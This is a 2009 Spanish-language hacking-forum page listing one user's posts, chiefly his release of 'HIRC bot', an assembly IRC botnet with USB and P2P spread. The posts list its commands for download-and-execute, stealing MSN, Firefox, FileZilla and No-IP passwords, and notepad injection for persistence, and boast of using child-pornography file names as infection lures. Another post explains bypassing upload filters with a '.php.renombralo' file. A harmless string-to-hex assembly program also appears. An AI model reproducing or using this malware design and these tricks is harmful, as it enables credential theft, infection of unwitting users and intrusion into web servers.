últimos mensajes de: YST

Mostrar Mensajes
Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... 68

291	Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b	en: 17 Septiembre 2009, 03:24 am
Cita de: kingo en 17 Septiembre 2009, 03:21 am Hola alguien me puede ayudar no se como funciona me pueden explicar o dar un manual- Tienes que por lo menos saber ensamblar en fasm y tener un poco de idea de programación para poder ocuparlo justamente publique el codigo sin ninguna interfas para que no cualquiera lo pudiera usar

292

Seguridad Informática / Nivel Web / Re: [Aplicación] String-Ascii by castg

en: 16 Septiembre 2009, 19:46 pm

Yo hice una tool parecida pero que soloi transforma a hexadecimal un string

dejo el codigo

Código

format pe console
entry start
include 'win32ax.inc'
.code
start:
invoke printf,Logo
 
invoke printf,"Ingrese la string"
invoke printf,n
invoke scanf,"%s",dBuffer
stdcall StringToHex ,dBuffer ,<invoke lstrlen,dBuffer >,dBuffer2
invoke printf,"La string en hexadecimal es:"
invoke printf,n
invoke printf,"0x%s",dBuffer2
invoke system,"pause>>NULL"
invoke ExitProcess,0
;Descripción: Convierte un dato a hexadecimal
; by YST
proc StringToHex,cPuntero,cCantidad,cBuffer
pushad
mov esi,[cPuntero]
 
 mov edi,[cBuffer]
 .bucle:
 cmp  [cCantidad],0
 je .salir
 xor edx,edx
movzx eax,byte[esi]
mov ebx,16
div ebx
mov bl, byte[numeros+eax]
mov byte[edi],bl
mov bl, byte[numeros+edx]
mov byte[edi+1],bl
add edi,2
inc esi
dec  [cCantidad]
jmp  .bucle
.salir:
popad
ret
numeros db '0123456789ABCDEF',0  
endp
.data
Logo db '                      ===================================',13,10          ; LOGO PRINCIPAL
     db '                      =        StringToHex  by YST      =',13,10
     db '                      ===================================',13,10,13,10,13,10,0
dBuffer2 rb MAX_PATH*2
dBuffer  rb MAX_PATH
n db 13,10,0
   section '.idata' import data readable writeable
   library kernel32,'kernel32.dll',msvcrt,'msvcrt.dll'
   include 'api/kernel32.inc'
import msvcrt,printf,"printf",system,"system",scanf,'scanf'
 
section '.reloc' fixups data discardable

293	Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b	en: 16 Septiembre 2009, 00:59 am
Cita de: ^DeMoN^ en 15 Septiembre 2009, 21:24 pm Una pergunta el comando download, baja elarchivo y lo autoejecuta? Se ve bueno lo tengo que probar.. yo sigo con los viejos rx xD oye un consejo, hay una opcion en los rx que es la forma del nick que queres(COUNTRYNICK, OWNERNICK o algo asi xDDD).. que peude ser por pais o por el nombre de la maquina o un nombre aleatorio.. estaria bueno que lo tenga el tuyo tambien y lo que no vi fue una pass para los bots.. un login osea te hacen caso solo con el nickmaestro? solo eso xD saludos El comando !DF baja el archivo y lo ejecuta Lo de los se puede cambiar para que sea "El nick que quieras" + Numero X , el comando !CP mediante un PHP te cambia el nick a "Primera 2 letras del pais" + Numero X . Sobre lo de hacer un login si quieres lo hago pero no lo veo necesario

294	Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b	en: 15 Septiembre 2009, 19:42 pm
Cita de: skapunky en 15 Septiembre 2009, 15:15 pm Si por ver el funcionamiento de un bot se debe enaltecer la pornografía infantil yo voto como mínimo que se borre ahora mismo éste tema. Parece mentira la inmadurez de cierta gente . Espero que lo digas en broma . Cada uno le pone los nombres con que quiere que se propague para eso di el source , esos son los nombre que ocupaba yo , lo siento si les duele la realidad pero la pornografia infantil es muy descargada por las redes p2p y en las propagaciones la idea es que infecten . Saludos

295	Seguridad Informática / Análisis y Diseño de Malware / Re: [Source] HIRC bot v1.1b	en: 15 Septiembre 2009, 01:23 am
Cita de: Karcrack en 15 Septiembre 2009, 01:11 am Cita de: Erik# en 15 Septiembre 2009, 00:18 am Si es de YST [ironia]debe de ser de mala calidad[/ironia] No! Si es de YST ha de ser humilde! Hulmilde Software ™ La H es de Humilde

296

Seguridad Informática / Análisis y Diseño de Malware / [Source] HIRC bot v1.1b

en: 14 Septiembre 2009, 20:05 pm

HIRC BOT v1.1 beta

¿Que es ?
HIRC BOT es un Bot IRC programado en ASM con propagacion USB y P2P(emule y ares )

¿Cuales comandos tiene?

Código

;######################################################
;######################################################
;#              COMANDOS                              #
;#!CC <canal> <clave>  = Se conecta a otro canal      #
;#!RB                  = Reinicia el server           #
;#!SB                  = Saca el bot                  #
;#!SC                  = Nos desconectamos del canal. #
;#!IP                  = Obtiene la IP del BOT        #
;#!SO                  = Obtiene el sistema operativo #
;#!PN                  = Obtiene el nombre del PC     #
;#!UN                  = Obtiene el nombre de usuario #
;#!HL                  = Obtiene las unidades del PC  #
;#!IG                  = Obtiene informacion del PC   #
;#!LE                  = Obtiene el idioma del PC     #
;#!DF <URL>            = Descarga un archivo.         #
;#!CM                  = Obtiene claves del MSN       #
;#!CF  <URL>(opcional) = Claves Firefox               #
;#!ZF                  = Claves FileZilla             #
;#!CP <PHP>            = Cambia el nick a el pais     #
;#!CN                  = Obtiene claves del No-IP.    #
;#!RA  <File>          = Se propaga por p2p.         #
;######################################################
;######################################################

¿Para que son el resto de los archivos?
Son para el comando "!CC" que utiliza el PHP para detectar el pais de que es el BOT
Pequeña explicación sobre cositas del BOT
El bot crea un proceso del notepad donde inyecta codigo para que si el se cerrara el proceso del BOT se vuelva a abrir.

El BOT tiene propagacion p2p por Emule y ARES.

Las claves del Firefox son de la Ultima version el 3.5.x .

Hay un comando que es el !CD que obtiene las claves del DynDNS que se me olvido ponerlo .
Descargar

297	Seguridad Informática / Nivel Web / Re: Vulnerabilidad en la subida de imagenes	en: 13 Septiembre 2009, 16:48 pm
Cita de: 50l3r en 13 Septiembre 2009, 10:59 am que quieres decir con eso yst, que hay vulnerabilidad? o que con ese metodo se podria conseguir en x web? En el metodo de WHK no hay bug ya que detecta la ultima extención y filtra si no es jpeg,gif,etc.. , pero en muchos uploader's que solo filtran extensiones como el .php y eso si esta ese bug

298	Seguridad Informática / Nivel Web / Re: Vulnerabilidad en la subida de imagenes	en: 13 Septiembre 2009, 02:02 am
Cita de: Jubjub en 12 Septiembre 2009, 12:20 pm Cita de: JaAViEr♂ en 12 Septiembre 2009, 11:31 am Cita de: Jubjub en 4 Septiembre 2009, 19:03 pm Pero señores, si es .jpg que coño van a ejecutar? Si no tienes LFI, ni te preocupes, subiran la shell terminada en jpg, y simplemente dara error al mostrarse No creas... Si pones en la cabecera GIF89 mas un code malicioso, puedes hacer algo... Soler, creo que a tu code le hace falta verificar las cabeceras. Saludos. SI filtras por extensiones y prohibes las .php, php5, php4 y demas, ya que el servidor se basa en ello para ejecutar codigo php o no, no puedes hacer nada, no? Prueba poniendo un archivo .php.renombralo Te lo ejecuta igual

299	Programación / Programación Visual Basic / Re: [SRC] Deshabilitar TaskMgr NUEVO METODO	en: 7 Septiembre 2009, 20:06 pm
Muy buen code Tienes una memoria que la quisiera yo ya ni me acordaba que te habia mencionado la idea de que emdiante Mutex se podia bloquear el taskmngr Saludos

300	Programación / ASM / Re: [Ayuda]MOVSD y MOVSW	en: 6 Septiembre 2009, 19:54 pm
CLD Borra la bandera de dirección ,asignándole un 0 . Las instrucciones de primitivas de cadena incrementan (e)si y (e)di de manera automatica Formato de instrucción: CLD

Páginas: 1 ... 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 [30] 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 ... 68